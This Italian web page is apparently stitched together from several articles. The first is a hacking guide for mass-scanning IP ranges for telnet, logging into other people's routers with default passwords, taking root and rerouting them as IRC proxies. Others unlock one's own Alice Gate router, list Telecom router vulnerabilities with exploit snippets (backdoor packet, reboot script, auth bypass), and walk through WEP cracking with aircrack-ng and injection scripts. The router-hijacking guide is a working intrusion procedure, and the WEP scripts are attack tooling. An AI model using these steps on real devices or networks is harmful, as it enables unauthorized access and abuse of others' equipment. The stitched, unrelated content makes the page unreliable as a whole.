+SUPERSCAN3 ( Per scannare un rage nella porta 23 )
+PUTTY ( terminale per accedere al vostro router ownato )
+WORD LIST ( word list delle attuali password per router ) reperibile
presto nel sito della crew..
+EXPLOIT CISCO ROUTER ( in alternativa usare exploit che craccka le
pass del cisco )
+UN BUON PROXY ABILITATO ( Ritengo piu opportuna usare MultiProxy
che incatena piu di 5 proxy )

PRIMA DI INIZIARE COME SEMPRE I FASTIDIOSI E NOIOSI DISCLAMER…..

[-DISCLAMER-]

Tutto il contenuto di questo book è da ritenersi dannoso quindi non applicabile. L’utente è pregato
di non mettere in atto quanto scritto .Esso è solo stato pubblicato per offrire una conoscenza maggiore
in questo ambito ,NON per altri scopi.Il testo non si puo’ modificare ne tanto meno vendere senza il
consenso dell’autore.Se non si rispettano le norme l’utente avrà commesso azione illegale

~~PASSO (1)~~

Per prima cosa iniziare a scannare il nostro router usando superscan3
credo che ormai tutti quanti sappiano usare superscan3 ma per le nuove
compagnie niubbe dedico 5 righe per la spiegazione su come configurare
SuperScan3

***GUIDA E CONFIGURAZIONE SUPERSCAN 3***
Installare il programma reperibile da qualsiasi fonte.. ( google per esempio )
+Dirigersi su PORT LIST SETUP
+Evidenziare con una V la porta 23 Fire HacKer, Tiny Telnet Server – TTS, Truva Atl
che si mettera’ in ascolto avviando lo scan solo sulla 23
+Dirigersi su START E selezionare lo “start” e lo “stop” il rage selezionato….
consiglio vivamente rage tipo 151.25,… 83.108,… 80.177….
+Avviare lo scan e una volta finito cliccare su “PRUNE” ke ti da’ tutte quelle con la
23 aperta ovvero ” OPEN PORT ”

Per riconoscere i d-link e’ molto seplice sono scritti in questa maniera…

D-link >>> …..!

Invece gli Zyxel in questa maniera…

Zixel >>> ….password

Una volta salvati in un .txt prendere il vostro ip e incollatelo nel browser…
a questo punto vi chiedera’ il “LOGIN” ovvero USERS E PASS
ecco qui ke interviene la password list..che avrete… qui vi dico le prime
pass e user di DEFAULT dei router….

1)
USER: Admin
PASS: admin

2)
USER: Admin
PASS: password

3)
USER: Admin
PASS: Password

4)
USER: Admin
PASS: Admin

~~PASSO (2)~~

Una volta che avrete messo user e pass e vi sarete loggati nella shell ovvero la shell del
router, potrete anke accervi da terminale ovvero dal Putty…

Per chi nn lo sapesse…
PuTTY è un client che permette di connettersi ad una terminale Unix sfruttando i protocolli
SSH, Telnet o rlogin.

Una volta aperto il putty mettere l’ip e connettetevi sulla 23 TELNET…
Una volta loggati dovrete mettere user e pass ke avete messo aal’inizio…

ATTENZIONE

Dovrete loggarvi come utente root per avere i permessi a tutti i file di scrittura…
Quindi a user loggatevi con un bel ” root ” e pass la password ke avete trovato con l’exploit
o con quella di default…( consiglio vivamente di cambiare la pass di accesso dalle opzioni
del router per evitare ulteriori owned da parte di altri utenti….

~~PASSO (3)~~

Se volete usare questo router per joinarlo su irc tipo Proxy seguite i seguenti passi…

Sempre da root degitate questo comando…

ifconfig

Subito seguito da :

#iptables -t nat -A PREROUTING -p tcp –dport 5555 -j DNAT –to 62.211.73.231:6667

Spieghiamo il codice…

#iptables -t nat -A PREROUTING -p tcp –dport 5555 -j DNAT –to 62.211.73.231:6667
| | |
sistema di configurare porta in Qui va il server irc
netfilter, definendo le cui si mettera’ ovviamente se e’ un cisco
regole per i filtri di in ascolto il cisco.. tiscali metterete l’ip del
rete e il reindirizzamento server di tiscali…
NAT. Spesso con il termine basta ke fate da cmd
iptables ci si riferisce all’intera nslookup irc.tiscali.it
infrastruttura, incluso netfilter.

Guida ufficiale per sbloccare Alice Gate 2 Plus Wifi, trasformazione in router ADSL2+ Wireless

Ecco la guida semplificata per sbloccare il modem Alice Gate 2 Plus Wifi e trasformarlo in un ottimo router ADSL2+ programmabile in tutto e per tutto. Attenzione, se avete il router a noleggio questa operazione non è lecita e invalida la garanzia. La modifica descritta nell’articolo non è compatibile con i servizi aggiuntivi di Alice come Aladino Voip e le 5 sessioni multiple, se non siete interessati a questi servizi buona lettura!
ATTENZIONE: Questo articolo è stato pubblicato più di un anno fa. Le informazioni potrebbero non essere aggiornate. Vi consiglio di cercare in rete eventuali aggiornamenti prima di sbloccare il modem e perdere la configurazione telecom. Lo staff di cervogia non offre supporto tecnico in caso di malfunzionamenti dopo la modifica.
Dopo il successo dell’ Articolo: “La Classifica dei modem Telecom che diventano router! Dalle origini ad oggi ” Eccomi a spiegare come si trasforma Alice Gate 2 Plus Wifi l’ultimo modem/router telecom in un normale router ADSL2+ compatibile con gli altri operatori ma soprattutto lo si trova a buon mercato (su ebay per esempio). Non mi assumo alcuna responsabilità per le procedure qui sotto descritte e vanno eseguite sul proprio modem e non quello a noleggio telecom. Questo era doveroso dirlo poi ognuno faccia quello che vuole!
BRIDGED+ROUTED, ovvero router ufficiale senza modifiche!
Per chi fosse interessato all’attivazione della modalità Bridged+Router oppure non è uno smanettone vi rimando alla lettura di questa importante FAQ: “Alice, svelato il Mistero della Modalità Bridged+Routed” Eseguite la modifica sotto descritta solo nel caso non vi riescano ad attivare dal 187 questa modalità o volete l’accesso a tutte le funzioni del router. Ripeto che dopo la modifica non funzioneranno il servizio VOIP (Aladino) e le 5 sessioni IP e verranno cancellate le informazioni che riguardano tali servizi (non conosco il metodo per il ripristino, se è possibile, della configurazione originale).
Situazione di partenza e ciò che speriamo di ottenere alla fine
AG2Plus Wifi Prima AG2Plus Dopo
Prima della Modifica Dopo la modifica


Alice Gate 2 Plus wifi La guida è valida solo per il router che vedete qui a sinistra. Se avete il modem rosso e nero simile (Alice GATE W2+ Vela a destra) presto su questo sito ci troverete un’altra guida per la modifica. No Vela
Per chi ha l’interno del modem diverso:
La guida è RIFERITA al modem prodotto dalla PIRELLI (vedi etichetta nell’immagine sotto a destra). Attenzione i modem prodotti da “industrie dial face” non sono compatibili con questa guida! Per maggiori informazioni leggete la FAQ Posso Sbloccare il modem Alice Gate 2 Plus Wi-Fi prodotto da “INDUSTRIE DIAL FACE” ? con le foto del circuito e un approfondimento.
1) Smontaggio e apertura router
Alice Gate 2 Plus wifi Alice Gate 2 Plus wifi retro
Visto da “sopra”
Visto da “sotto”

Per smontarlo occorre staccare i 4 piedini in gomma antiscivolo (vedi la foto sopra a destra). Svitate le 4 viti e con una certa delicatezza si procede all’apertura del router. Consiglio di rimuovere l’etichetta che protegge la porta USB. Se sentirete qualche schiocco è normale.

2) Realizzazione del PONTICELLO
Alice Gate 2 Plus wifi Aperto Particolare testpoint
Dopo lo smontaggio Particolare ingrandito
Dopo averlo smontato ed aver individuato il testpoint ovvero le “piazzole” da mettere in corto con un sottile cavo elettrico sbucciato o con graffetta (quella per tenere i fogli uniti) o con le forbici eseguite il corto e così accendetelo. Dopo qualche secondo dovrebbe restare accesa solo un LED ROSSO (il power) che vi indica che l’operazione è riuscita.
Aiuto per chi ha difficoltà a far accendere il LED ROSSO: Durante la fase di accensione fate ripetutamente il corto (facendo attenzione a non beccare altre piazzole). Questo è successo a me dopo la prima modifica per caricare un altro firmware, quindi armatevi di pazienza!
Ricordo che il ponticello serve solo per far accendere il LED ROSSO, subito dopo dovete toglierlo perchè non necessario
3) Configurazione PC per l’aggiornamento del firmware
Collegare tramite cavo di rete il vostro PC alla porta ethernet 1 del router (non è possibile effettuare il primo cambio firmware tramite wireless.
Configurazione Rete Configurazione scheda di rete PC

IP: 192.168.1.2
SUBNET MASK: 255.255.255.0

DEFAULT GATEWAY: 192.168.1.1 (opzionale)

SERVER DNS PRIMARIO: 212.216.112.112 (opzionale)
SERVER DNS SECONDARIO: 212.216.172.62 (opzionale)

Sopra vedete la configurazione che dovrà avere il vostro PC per sostituire il firmware. Importante è utilizzare la Porta Ethernet 1 sennò non funzionerà questo metodo. Dovete assegnare alla vostra scheda di rete l’ip manualmente perchè il router è in “rescue mode” o modalità di emergenza e vi permette solo di caricare il nuovo firmware. Questa configurazione serve solo per sbloccare il modem, quindi per la navigazione possiamo utilizzare il comodo DHCP o altro IP

4) Aggiornamento FIRMWARE
Aggiornamento Firmware
Tramite internet explorer o il vostro browser preferito aprite la pagina http://192.168.1.1/ e vi troverete davanti una schermata come questa che vi permette solo di eseguire l’aggiornamento del firmware. Il firmware di questa guida lo trasforma in router wifi completamente configurabile escludendo il VOIP, per altre funzioni come samba, print server a breve una guida!
Scarica il Firmware: AGW2-PLUS_flash_image_8MB.zip Archivio ZIP
Altri FIRMWARE: Per chi volesse caricarci altri firmware occorre ripetere la procedura del ponticello due volte, una con il FIRMWARE PSI Clear (tale firmware lo rende inaccessibile) e la successiva con il firmware che che vi interessa inserire. Io sto testando l’ultimo firmware di roleo che lo trasforma in USR 9108. Disponibili firmware per abilitare il router come print server e molto altro grazie al lavoro di Beghiero, Roleo e altri che potrete trovare sul Forum de “ilpuntotecnicoadsl”
Scarica il Firmware: AGW2-PLUS PSI Clear Archivio ZIP
Per scaricare gli altri firmware visitate l’ FTP di Beghiero o di Roleo
Una volta estratto dall’archivio ZIP il firmware AGW2-PLUS_flash_image_8MB.w inseritelo nella pagina e cliccate su “UPDATE SOFTWARE”. Occorre attendere il caricamento del nuovo firmware. Questa operazione è lunga e anche se non vi pare faccia niente lasciate il router acceso almeno 3 o 4 minuti e dopo vedrete che si riavvia da solo e si riaccendono tutti i LED. Adesso avete un router e siete pronti per la configurazione.
ATTENZIONE: Questo firmware è funzionante con protocollo ADSL PPPoe, per il PPPoa ho notato problemi (in quanto nel routing occorre cancellare una route statica e poi al successivo riavvio ricompare). quindi vi consiglio di lasciare PPPoe ROUTER e procedere con la configurazione.
5) Configurazione router
Autentificazione Router Per accedere la configurazione del router dovete connettervi all’indirizzo:
http://192.168.1.1/main.html

Nome utente: admin
Password: admin

Consiglio di eliminare le impostazioni sulla scheda di rete (vedi punto 3 di questa guida) e lasciare “ottieni automaticamente indirizzo IP” e lo stesso per i DNS.

Se non si dovesse aprire la pagina verificate che il router sia alimentato e connesso al pc e provate a ripetere da capo le istruzioni per l’aggiornamento qualora non sia andato a buon fine l’aggiornamento del firmware.
Router Pirelli Home Ed ecco finalmente l’accesso a tutte le funzioni del router! Se non siete pratici con la configurazione del router partendo da zero allora vi consiglio di caricare la nostra configurazione funzionante! e fare solo le piccole modifiche del caso
6) Configurazione router facilitata
Scaricate la configurazione: Configurazione ALICE poi collegatevi alla home page del router http://192.168.1.1/main.html cliccate sulla sezione MANAGEMENT e dopo SETTINGS UPDATE e inserite il file configurazione.conf presente nell’archivio ZIP e aspettate almeno 3 o 4 minuti per il riavvio del router. Valida per chi ha ALICE o modificando la user e password per altri operatori che supportano PPPoe.
ATTENZIONE: Non fate mai il ripristino dei parametri di fabbrica SETTINGS RESTORE, l’operazione non vi permetterà più di accedere al router e il router tornerà ad essere un normale modem (bridged mode) e poi tocca rismontarlo e rifare tutto daccapo!
7) Personalizzazione
Per chi ha scaricato la nostra configurazione semplificata occorre se vi serve abilitare il wireless. Per far ciò collegatvi alla home page del router poi cliccate sulla sezione WIRELESS, dopo spuntate ENABLE WIRELESS (verificando che enable RADIO sia spuntato, se non lo fosse spuntatelo).
Dopo andate su SECURITY e potrete scegliere il SSID ovvero il nome della vostra rete wireless e la chiave di cifratura, io consiglio WPA-PSK che in generale è un po’ compatibile con tutti i PC recenti.
8) Extra
Spiegazione dei LED che ci interessano:
POWER VERDE LAMPEGGIANTE, è normale visto che non trova la SIM CARD che volutamente non abbiamo inserito!
USB/ETH VERDE quando abbiamo connesso un PC tramite USB o ETHERNET, lampeggia quando si fa del traffico
WI-FI ROSSO se nessuno sta navigando wireless, altresì è VERDE
SECURITY VERDE se attivata cifratura WPA (verde lampeggiante se attiva cifratura WEP), ROSSO se disattivata la cifratura
ADSL VERDE, ha agganciato la linea ADSL
SERVICE SPENTO perchè non sono attivi servizi telegestiti come AladinoVOIP, Home TV
VOIP SPENTO, vedi sopra il SERVICE, stesso motivo!
Abbellimenti vari:
Per evitare che al buio il pannello anteriore bianco (quello dove c’è scritto POWER, WI-FI, SECURITY faccia intravedere i colori dei vari led dopo che avete aperto il router per fare la modifica con del comune nastro isolante nero ricoprite la parte interna del pannello e vedrete che al buio il pannello sarà schermato e non illuminato!
Ecco come ho disattivato i LED che non mi interessa di vedere accesi (esempio power lampeggiante). Ho preso un piccolo rettangolino sempre di nastro isolante nero e l’ho applicato come “toppa” sul LED risultato non si vede il LED e neanche il nastro. Se volete potete farlo anche su tutti i LED se per esempio metterete il router in camera da letto e vi da fastidio la luce dei LED.
Considerazioni finali:
Un bel router e cosa più importante è FUNZIONANTE. In questo momento è sempre in fase di testing o per meglio dire stressing per vedere se va o meno in blocco! Il VELA ho dovuto abbandonarlo per i suoi continui blocchi e lo consiglio solo come access point. Adesso sto provando il firmware US Robotics perchè con emule+bittorrent ho avuto alcuni blocchi del router.
Link Esterni:
ilpuntotecnicoeadsl.com Forum de “ilpuntotecnicoadsl” Interessante forum tecnico dove troverete persone che hanno sviluppato queste modifiche e leggendo nei vari messaggi troverete interessanti informazioni aggiornate.

Giuseppe-dalessio.it Come sbloccare il Modem Alice Gate 2 Plus Wi-Fi

Guida a cui mi sono ispirato per scrivere la mia guida ufficiale, molto disponibile anche l’autore.
Altra guida interessante dai contenuti simili alla guida di Giuseppe D’alessio.
Esclusione di responsabilità:
Non mi assumo alcuna responsabilità in caso di modifiche non riuscite come ho scritto più volte prima di spiegare la procedura per lo sblocco questo router ADSL. Chi prova le cose sopra descritte se ne assume la piena responsabilità quindi se non siete d’accordo vi invito a non fare niente e rivolgervi al vostro provider o a un tecnico privato per la configurazione del router ADSL.
Feedback:

Ti è piaciuto questo articolo? Pensi che ci siano degli errori o delle inesattezze? Vuoi inviarci del materiale? Vuoi aiutarci a migliorare il nostro portale tecnico ADSL? cliccando sulla sezione CONTATTACI puoi contattarci.

Elenco delle vulnerabilità dei modem /router telecom conosciute!

Vi siete mai chiesti se il modem del vostro provider (telecom, nel caso trattato) vi offa dei modem/router che sono affidabili dal punto di vista della sicurezza informatica? In questo articolo verranno elencate tutte le principali vulnerabilità note dei principali modem o router forniti con i contratti telecom. Vengono spiegati anche i rimedi! Quindi se avete un modem non di ultima generazione leggete l’articolo!
Alice gate 2 plus dial face Alice Gate (VOIP) 2 Plus Wifi

Data: Ottobre 2008
Rischio: Moderato

Versioni inteessate:
Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli based on Broadcom platform.
AGA [Alice Gate2 plus Wi-Fi]
AGB [Alice Gate2 plus]
AG2P-AG3 [Alice Gate W2+]
AGPV-AGPF [Alice Gate VoIP 2 Plus Wi-Fi]

Vulnerabilità: Lato LAN possibile dopo aver inviato uno speciale pacchetto al router accedervi con i privilegi di amministratore e poter leggere/modificare/cancellare ciò che si vuole.

Esempio:
1) IP-protocol-number 255 (there’s a RAW SOCKET listening on the router)
2) Payload size 8 byte
3) The payload are the first 8 byte of a salted md5 of the mac address of device br0
4) br0 in these modems has the same mac of eth0

Soluzione: Pare che Pirelli Broadband Solutions sia venuta a sapere di questa BACKDOOR e avrebbe modificato la procedura e durante la prima attivazione con relativo aggiornamento firmware non dovrebbe più essere permessa questa operazione.

Alice gate 2 plus dial face Alice Gate 2 Plus Wifi (Industrie Dial Face)

Data: Settembe 2008
Rischio: Moderato

Vulnerabilità: Lato LAN è possibile accedere al menu di configurazione avanzato (dialface theme). Praticamente aprendo uno script dalla home page del modem è possibile modificare a proprio piacimento tutte le opzioni e bloccare il modem (modifica del firmware).

Soluzione: Al momento non è dato di sapere se Industrie Dial Face abbia rilasciato un patch e nel caso di aggiornamento firmware verrebbe fatto da remoto a nostra insaputa (protocollo TR-69).

ercisson hm220dp
Ericsson HM220dp

Data: Febbraio 2004
Rischio: Moderato


Vulnerabilità
: Tale Modem/Router non è  provvisto di password per accedere al pannello di controllo web (Default IP 192.168.254.254). Questo problema permette a un malintenzionato di modificare la configurazione del modem causandone il blocco. Nell’esempio possiamo verificare come sia possibile riavviarlo con un banale script. Cambiando l’IP non sussiste questa anomalia.

Esempio:
[script]
function exploit(){
window.location = “view-source:http://192.168.254.254/dummy.html?reboot=1&#8243;;
}
[/script]
[input type=”button” value=”disconnect” onClick=”exploit();”]

Soluzione: Aggiornamento del firmware originale

Siemens Santis50 ADSL Router
Ericsson HN294dp ADSL Router
Siemens SANTI50 ADSL Router / Ericsson HN294dp ADSL Router
Router identici al modello Dynalink RTA300W

Versioni interessate:
Ericsson HN294dp Firmware 4.2.8.0 (OEM Version)
Siemens Santis 50 Firmware version 4.2.8.0 (OEM Version)

Data: Luglio 2005
Rischio: Moderato

Vulnerabilità: Questo router tramite un attacco DOS (porta 280 http-mgmt) viene “Freezzato” e permette di accedere alla CLI (consolle comandi telnet) senza autenticazione permettendo qualsiasi comando. Potenzialmente è  possibile rendere tale router inutilizzabile.

Esempio:
Da consolle linux con lo scanner AMAP lanciare sull’IP del router (192.168.1.1 esempio): amap 192.168.1.1
Il router è frizzato e ci permette un accesso telnet da amministratore senza chiederci la password.

Soluzione: Aggiornare il firmware a una versione più moderna, se il router in oggetto è noleggiato dal vostro provider chiederne la sostituzione o passare a contratto con altro router.

Impieghi interessanti: Nel caso non fosse possibile accedere al router per la programmazione perchè vi siete dimenticati la password e non è quella di default telecom con questo sistema è possibile cancellare la rom e rimetterci un firmware aggiornato. Da me provato e funziona!

Pirelli Age microbusiness
Pirelli AGE Microbusiness

Data: Gennaio 2002
Rischio: Moderato

Vulnerabilità: Pieno accesso da remoto al router con la possibilità di riprogrammare il router a nostro piacimento con tutti i relativi problemi di sicurezza informatica che in una azienda non possono essere trascurati. La vulnerabilità consiste da parte di telecom di aver lasciato per la maggioranza di questi router le password di default e che tale router per motivi di telegestione è accessibile dall’esterno della vostra rete!

Soluzione: Cambiare password o passare a un router più evoluto e con contratti ADSL più recenti e più performanti. Questo router veniva dato con le prime ADSL Business di telecomitalia (prima del famoso smart gate).

Ditemi cosa ne pensate!”!! 😀

Samsung NC10 – Wep Cracking

Premetto che quest’articolo è solo a fini didattici, detto questo possiamo iniziare a parlare di come approntare il nostro netbook Samsung NC 10 per il wep cracking.

Primo step (Linux onboard):

Installare Linux Ubuntu o Kubuntu su una partizione libera oppure tramite Wubi, quest’ultimo sistema, vi permette di installare Linux direttamente da Windows, evitando così tutti i problemi di partizionamento ed una volta installato, al reboot del computer, avrete la doppia scelta Windows o Linux.

Secondo step (installiamo i driver MadWifi):

Facciamo il boot da Linux.
Installiamo i drivers wireless per Linux:
bisogna installare il pacchetto build-essential e compilare i driver madwifi ed i madwifi-tools (sudo apt-get install madwifi-tools), ma occorre disabilitiare i driver con restrizioni che riconoscono la scheda ma non le permettono di funzionare:
Sistema>Amministrazione>Driver Hardware e cliccare sul tasto Disattiva in basso a destra, quindi riavviare il sistema.
Dopo queste operazioni, scarichiamo gli ultimi driver madwifi da QUI , ed estraiamoli sul Desktop, apriamo un terminale e digitiamo:
sudo apt-get install build-essential, che è il pacchetto contenente i software necessari alla compilazione dei driver, quindi sempre da terminale, si passerà alla compilazione dei drivers:
cd Scrivania/madwifi-hal* (se abbiamo scompattato i drivers sul Desktop)
sudo make
sudo make install
sudo modprobe ath_pci

Per far sì che i drivers siano caricati automaticamente all’avvio.
sudo gedit /etc/modules o sudo kate /etc/modules
e in fondo al file, aggiungiamo:
ath_pci
salviamo e riavviamo.
Al riavvio successivo, la scheda wireless dovrebbe essere visibile e configurabile cliccando sull’icona di Network Manager nel tray, oppure, vi consiglio di usare WiCd e disinstallare il Networtk Manager.
(Nota personale: dopo tutta questa procedura, ho pure ripristinato i driver con restrizioni e tutto funziona)

Terzo Step (armiamo il sistema):

Scarichiamo la suite Aircrack-ng da Installa pacchetti o da terminal windows digitando:

sudo apt-get install aircrack-ng

Dopo quest’operazione digitiamo in terminal window il comando:

iwconfig

dovremmo vedere una cosa simile (ho oscurato i miei riferimenti con delle X):

wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:”XXXXXX” Nickname:””
Mode:Managed Frequency:2.437 GHz Access Point: XX:XX:XX:XX:XX:XX
Bit Rate:24 Mb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality=32/70 Signal level=-61 dBm Noise level=-93 dBm
Rx invalid nwid:780 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Adesso ci tocca mettere la nostra scheda wireless (ath0) in “Monitor mode”, quindi digitiamo:

sudo airmon-ng stop ath0
sudo airmon-ng start wifi0

poi

iwconfig
wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.437 GHz Access Point:
Bit Rate:24 Mb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality=32/70 Signal level=-61 dBm Noise level=-93 dBm
Rx invalid nwid:780 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

A questo punto dobbiamo rilevare le reti disponibili:
scriviamo:

sudo airodump-ng ath0

e avremo un output del genere:

CH 11 ][ BAT: 34 mins ][ Elapsed: 8 s ][ 2009-01-24 12:32

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:XX:2E:XX:XX:A8 8 4 2 0 11 54. WEP WEP Pippo
00:04:BE:XX:68:XX 28 27 0 0 6 54. WPA TKIP PSK
BSSID STATION PWR Rate Lost Packets Probes

dal quale capiamo che c’è una rete wireless protetta dal WEP, sul canale 11 con MAC Adddress: 00:XX:2E:XX:XX:A8 e ESSID: Pippo

adesso possiamo iniziare l’attacco, apriamo 4 terminal windows, nella prima scriviamo:

sudo airodump-ng atho -w pacchetti_pippo –bssid 00:XX:2E:XX:XX:A8 -c 11

Ma, facciamo un passo indietro, prima di lanciare airodump-ng, dobbiamo scrivere un paio di script bash:

primo.sh
# /bin/bash/
# questo script serve ad autenticarvi presso l’AP (Access Point) da attaccare
#echo “Scrivi il mio mac:”
#read mio_mac
echo “Scrivi l’interfaccia settata in monitor mode:”
read i
# qui mettete il Mac della vostra scheda
# lo scoprite con iwconfig
mio_mac=”00:00:00:00:00:00″
echo “scrivi il MAC ADDRESS DELL’AP da attaccare”
read mac_ap
echo “scrivi l’essid della wlan da attaccare:”
read SSID_wlan
aireplay-ng -1 0 -e $SSID_wlan -a $mac_ap -h $mio_mac $i

Qui i dati saranno il MAC di Pippo e il nome Pippo (essid).

Lanciamo primo.sh con:

sudo sh primo.sh

Poi scriviamo secondo.sh:
# /bin/bash/
# qui mettete il Mac della vostra scheda
# lo scoprite con iwconfig
mio_mac=”00:00:00:00:00:00″
echo “Scrivi l’interfaccia settata in monitor mode:”
read i
echo “Scrivi ESSID dell’AP:”
read e
echo “scrivi il MAC ADDRESS DELL’AP”
read mac_ap
aireplay-ng -3 -e $e -b $mac_ap -h $mio_mac $i

lanciamo secondo.sh con:

sudo sh secondo.sh

Questo script serve a iniettare (packet injection), i pacchetti sull’AP, al fine di generare traffico e poter catturare molti pacchetti, da dare in pasto all’ultima arma: aircrack-ng

nell’ultima terminal window scriviamo:

sudo aircrack-ng -z -b mac_di_pippo pacchetti_pippo*.cap

ma basterebbe anche solo:
sudo aircrack-ng -z pacchetti_pippo*.cap

lasciamolo lavorare….dopo un tot. di tempo, dai 3 ai 10 minuti, a seconda della forza del segnale, otterrete una key found in esadecimale:

KEY FOUND! [ XX:D1:F2:67:4D:18:6B:XX:XX:XX:1X:XX:XX ]
Decrypted correctly: 100%

A questo punto abbiamo la password in esadecimale, la possiamo già usare così, inserendola nel nostro gestore di reti, sia in Windows sia in Linux, la WEP Key Hex e non la WEP Key Passphrase.
Però, se vogliamo vedere se caso mai è una key umanamente leggibile possiamo provare a scrivere questo:

echo key_trovata | xxd -r -p

Adesso rimane l’ultimo problema, come trovare la sottorete ed il gateway dell’AP di Pippo?

lanciamo Wireshark, che avete previamente scaricato ed installato, poi apriamo i pacchetti pippo_pacchetti.cap (da File->Apri)
andiamo a su Edit -> Preferenze-> Protocolli
sceliamo il protocollo IEEE 802.11
ed inseriamo nel campo key1 la key che abbiamo trovato, poi un bel Applica ed infine un OK.
A questo punto vedremo i paccchetti in chiaro, con anche i botta e risposta del gateway col nostro computer, da qui si può risalire a che sottorete appartenga l’AP attaccato e qual’è il gateway.
Per i DNS, basterà usare gli OpenDNS ed il gioco è fatto!

Chiaramente, il wireshark, può anche non servire, se l’AP ha il DHCP attivato, quindi assegna automaticamente indirizzo IP, Gateway e DNS.

Infine scriviamo:

sudo rmmod ath_pci
e
sudo modprobe ath_pci

al fine di ripristinare la nostra scheda wireless per poter navigare.

Naturalmente, si può ampliare il discorso degli attacchi aireplay, del forging del MAC della propria scheda, dell’uso di Kismet…ma questo lo lascio a voi 😉

Nanni Bassetti

Articolo Articolo Storico Storico Stampa Stampa

Commenti
# 1
Ottimo riassunto
Di Ralf (inviato il 23/02/2009 @ 11:55:43)
# 2
Ciao, ho trovato molto interessante questa pagina, soprattutto in virtù del fatto che è specifica per il Samsung NC10, tuttavia ho un problema, perché settando ath0 o wifi0 in secondo.sh mi dice comunque “No replay interface specified”
Di Stefano (inviato il 28/02/2009 @ 00:42:30)
# 3
Non so che dirti…quella è la procedura devi aver sbagliato qualcosa tu…
perchè in secondo.sh la riga:
aireplay-ng -3 -e $e -b $mac_ap -h $mio_mac $i

prende il nome della scheda in variabile $i, che è impostata nella richiesta:

echo “Scrivi l’interfaccia settata in monitor mode:”
read i

Sennò lascia perdere i bash script e vai in manuale e vedi se continua a darti errore ok? 😉
ciao
Di Nanni Bassetti

Crackare una rete wireless(wep) con aircrack: procedura in windows xp

image

Disclaimer

Questa guida presuppone che la rete che state craccando sia di vostra proprietà. Entrare nelle reti altrui in italia e penso anche negli altri paesi del mondo è reato penale. In definitiva, utilizzate la guida quì proposta solo a scopo educativo e solo sulla vostra rete casalinga (e non su quelle di altre).

Cos’è aircrack ?

aircrack è un insieme di strumenti per la verifica di reti wireless:

  • airodump: 802.11 sniffer
  • aireplay: 802.11 generatore di pacchetti
  • aircrack: cracker per chiavi statiche WEP e WPA-PSK
  • airdecap: decifra file catturati WEP/WPA

Prerequisiti

  • Scaricate ed installate Aircrack
  • Se utilizzate “Winaircrack” (Aircrack con interfaccia grafica) copiate i files peek.dll e peek5.sys all’interno della cartella di Aircrack
  • Avrete anche bisogno di installare dei nuovi driver per il vostro adattatore di rete: i driver originali non sono stati pensati per fare cose simili (per trovare dei driver che possano fare al caso vostro visitate il sito WildPacket)
  • Per installare i nuovi driver aprite “clic destro su Risorse del Computer, Proprietà, Gestione Periferiche, clic destro sul vostro adattatore di rete, Proprietà, Driver, Aggiorna Driver, Installa da un elenco o percorso specifico” scegliete il percorso in cui avete scaricato i driver. Assicuratevi infine che il vostro adattatore di rete sia ora compatibile col tutto

Procedura

Il primo passo è ovviamente quello di trovare una rete wireless.

Digitate “Airodump” nel prompt di DOS (Start, esegui, cmd). Vi comparirà una finestra contenete le schede di rete trovate sulla vostra macchina. Notate che accanto al nome delle schede di rete è presente un numero identificativo. Ad esempio:

22 NETGEAR WAG511 802.11a/b/g Dual Band Wireless PC Card

In questo caso digitate 22, il numero identificativo della scheda che ci interessa utilizzare (in genere è quella che riporta una qualche identificazione del tipo “802.11x”).

Ora vi viene chiesto di indicare il chipset utilizzato dal vostro adattatore di rete. Ad esempio:

Interface types: ‘o’ = HermesI/Realtek

‘a’ = Aironet/Atheros

Selezionate il vostro, in questo caso scegliendo “o” oppure “a”. Per sapere quale chipset è montato sulla vostra scheda di rete potete dare uno sguardo al sito: http://www.linux-wlan.org/

Ora vi sarà richiesto di inserire il numero del canale da controllare (sniffing). In genere per gli USA e l’UK utilizzate l’11, per l’Europa il 14. Se volete fare una scansione di tutti i canali utilizzate lo zero.

In seguito il programma chiederà di digitare il nome da dare al file che verrà creato a partire dalla scansione del canale. Digitate il nome che vi pare, ad esempio “WEP1”.

Ora Aircrack vi chiederà se salvare gli interi pacchetti catturati o soltanto gli IV. Per craccare una chiave WEP vi basta salvare semplicemente gli IV (il che vi farà risparmiare diverso spazio sull’hard disk, quindi digitate “y”).

Adesso vedrete una schermata simile:

image

BSSID = l’indirizzo MAC dell’Access Point

PWR = indica la forza del segnale che si sta ricevendo

<!–
google_ad_client = “pub-1001936259289583”;
/* 336×280, creato 02/03/09 */
google_ad_slot = “4025636947”;
google_ad_width = 336;
google_ad_height = 280;
// –> <!–
window.google_render_ad();
// –>

BEACONS = sono pacchetti “in chiaro” che l’Access Point trasmette sostanzialmente per dire “sono un access point, collegati a me”

DATA = è quello che ci interessa: sono gli IV che Aircrack utilizzerà per trovare
la password WEP

ENC = il tipo di incapsulamento: WEP, WPA, OPEN…

ESSID = Il nome della rete Wireless. L’SSID è una sorta di identificativo della rete. Se ad esempio l’Access Point ha come SSID il nome “pippo” allora le schede wireless che ci si vogliono connettere devono impostare a loro volta come SSID “pippo”.

Nella seconda parte dell’immagine sopra vediamo i vari client che stanno “dialogando” con l’Access Point”, più esattamente vediamo i vari indirizzi MAC dei client. Quest’informazione può risultare utile in seguito quindi annotatevi gli indirizzi MAC. Questo perché in un Access Point è possibile impostare un filtro di indirizzi MAC: in questo modo soltanto le schede di rete che hanno un indirizzo MAC riportato nel filtro potranno collegarsi. Ciò significa che anche se possediamo la chiave WEP non possiamo accedere all’Access Point a meno che l’indirizzo MAC del nostro adattatore di rete non sia stato impostato nel filtro dell’Access Point. Ad ogni modo un caso simile sarà trattato dopo, per il momento non preoccupiamocene.

